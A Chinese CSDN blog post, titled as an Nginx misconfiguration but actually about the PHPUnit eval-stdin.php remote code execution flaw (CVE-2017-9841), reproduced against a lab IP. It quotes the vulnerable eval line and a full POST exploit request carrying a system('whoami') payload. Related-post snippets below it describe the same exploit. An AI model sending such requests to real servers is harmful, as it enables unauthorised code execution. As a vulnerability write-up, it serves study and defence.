Nginx配置错误

于 2021-12-24 21:35:15 发布
阅读量1.4k 收藏
点赞数
分类专栏: 渗透测试 网络安全 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44887395/article/details/122136313
版权

漏洞概述:
PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。
漏洞版本:

4.8.19 ~ 4.8.27
5.0.10 ~ 5.6.2

基本原理:
漏洞位于/phpunit/src/Util/PHP/eval-stdin.php

eval('?>'.file_get_contents('php://input'));

漏洞复现:
总体来说就是向

vendor/phpunit/src/Util/PHP/eval-stdin.php

发送POST请求执行php代码。

访问该路劲

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

抓包改为post方式

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 18

<?php system('whoami');?>
NL0ck_S
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【威胁分析】phpunit远程代码执行漏洞
sinat_35058227的博客
08-29 2879
phpunit是php中的单元测试工具 其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 威胁分析: 1、分析是否利用该漏洞 uri为:/vendor/phpunit/phpunit/src/Util/PHP
phpunit 远程代码执行漏洞(CVE-2017-9841)复现
热门推荐
SoulCat
05-28 2万+
phpunit 远程代码执行漏洞(CVE-2017-9841)复现 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。 漏洞概述: PHPUnit 是 PHP 程式语言中...
phpunit 远程代码执行漏洞(CVE-2017-9841)
EC_Carrot的博客
07-21 627
漏洞详细 phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码: eval('?>'.file_get_contents('php://input')); 如果该文件被用户直接访问到,将造成远程代码执行漏洞。 漏洞复现 直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/
Nginx漏洞利用与安全加固
weixin_30631587的博客
07-16 1336
本文主要分为两大部分,第一部分介绍了Nginx的一些常见安全漏洞的形成原因、利用方法,并给出了相应的解决办法;第二部分介绍了Nginx安全加固时需要关注的主要内容。 Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows等操作系统上,...
phpunit 远程代码执行 (CVE-2017-9841)
YouthBelief的博客
11-04 2460
@[TOC](phpunit 远程代码执行 (CVE-2017-9841)) phpunit 远程代码执行 (CVE-2017-9841) PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架。 0x01 漏洞描述 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 80端口 漏洞位于 /vendor/p
nginx配置1
08-08
在本文中,我们将深入探讨如何使用Nginx配置负载均衡,特别是针对Websocket应用的场景。首先,我们要明确,Websocket是一种在客户端和服务器之间建立持久连接的协议,它允许双向实时通信,非常适合需要实时更新的...
详解nginx 配置文件解读
09-29
【详解Nginx配置文件解读】 Nginx是一款高性能的HTTP和反向代理服务器,它的配置文件结构清晰,易于理解,对于服务器的管理和优化至关重要。本文将深入解析Nginx配置文件的各个部分,帮助读者更好地理解和配置Nginx...
nginx配置相关介绍
09-30
* error_log:指定 Nginx错误日志文件。 * pid:指定 Nginx 的进程 ID 文件。 * events:定义 Nginx 的事件处理机制。 * http:定义 Nginx 的 HTTP 服务器配置。 * upstream:定义 Nginx 的负载均衡服务器列表。 ...
nginx缓存及错误页面配置
09-30
主要介绍了nginx缓存及错误页面配置的相关资料,需要的朋友可以参考下
基于ThinkPHP5开发的漂亮通用后台全权限管理系统.zip
06-12
基于tp5.0+漂亮通用后台+全权限管理系统,基于tp5.0+漂亮通用后台+全权限管理系统,基于tp5.0+漂亮通用后台+全权限管理系统。
Nginx配置入门教程
09-30
本教程将带你走进Nginx配置的世界,从基础到进阶,一步步了解如何利用Nginx搭建高效稳定的网络服务。 ### 反向代理概念 反向代理是一种网络架构模式,其中Nginx作为服务器端的代理,隐藏了内部网络结构,增强了...
eval stdin.php,CVE-2017-9841到root提权
weixin_39684235的博客
03-11 1819
漏洞详情: http://phpunit.vulnbusters.com简单来说漏洞是出在phpunit,可以使用composer安装,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, 这个文件可以造成RCE:$ curl --data "...
CVE-2017-9841 phpunit 远程代码执行漏洞
weixin_51387754的博客
12-09 1691
漏洞简介 composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。通常这个目录需要放在web目录外,使用户不能直接访问。 phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码: eval('?>'.file_get_contents('php://input')
8.5-练习
~airrudder~
08-06 522
目录SSRFSSRF扫描内网靶机SSRF攻击 Redis333333XXE漏洞XXE读取/flag和./flag.php无回显XXE读取/flagPHP代码执行Thinkphp5 代码执行phpunit代码执行1111 上一篇 | 目录 | 下一篇 SSRF http://10.20.25.44/: SSRF 扫描内网靶机 http://10.20.25.44:82/: SSRF攻击 Redis,redis 密码 root http://10.20.25.44:84/: SSRF攻击本地的 php.
php 单元测试,phpunit
麦兜
08-29 173
phpunit 入门 安装 创建空目录,打开命令行进入刚刚创建好的目录,执行composer init。 执行命令,composer require phpunit/phpunit ,安装PHPunit,所有文件都会装在vendor目录下, 在vendor/phpunit/phpunit/phpunit文件,该文件没有后缀名。该文件很重要,很重要,很重要。 第一步些单元测试代码 第二步,写运行...
http/https服务器安全:嗅探漏洞url路径
zzhongcy的专栏
08-19 6216
这里记录一下我知道的一些经常被黑客嗅探的路径。 1、有些可能是正常路径,比如:GET /robots.txt 2、有些是需要加入安全策略的路径,比如:GET /phpMyAdmin/index.php 这里只是提供参考,大家平时多多注意点吧。 request: "GET / HTTP/1.1", request: "GET /robots.txt HTTP/1.1", request: "POST /Admin16c882df/Login.php HTTP/1.1", request: "GE...
nginx 配置错误页面
最新发布
07-28
配置错误页面,你可以按照以下步骤进行操作: 1. 打开你的 nginx 配置文件。默认情况下,它位于 `/etc/nginx/nginx.conf` 或 `/etc/nginx/conf.d/default.conf`。 2. 在 `server` 块中添加以下代码来配置错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值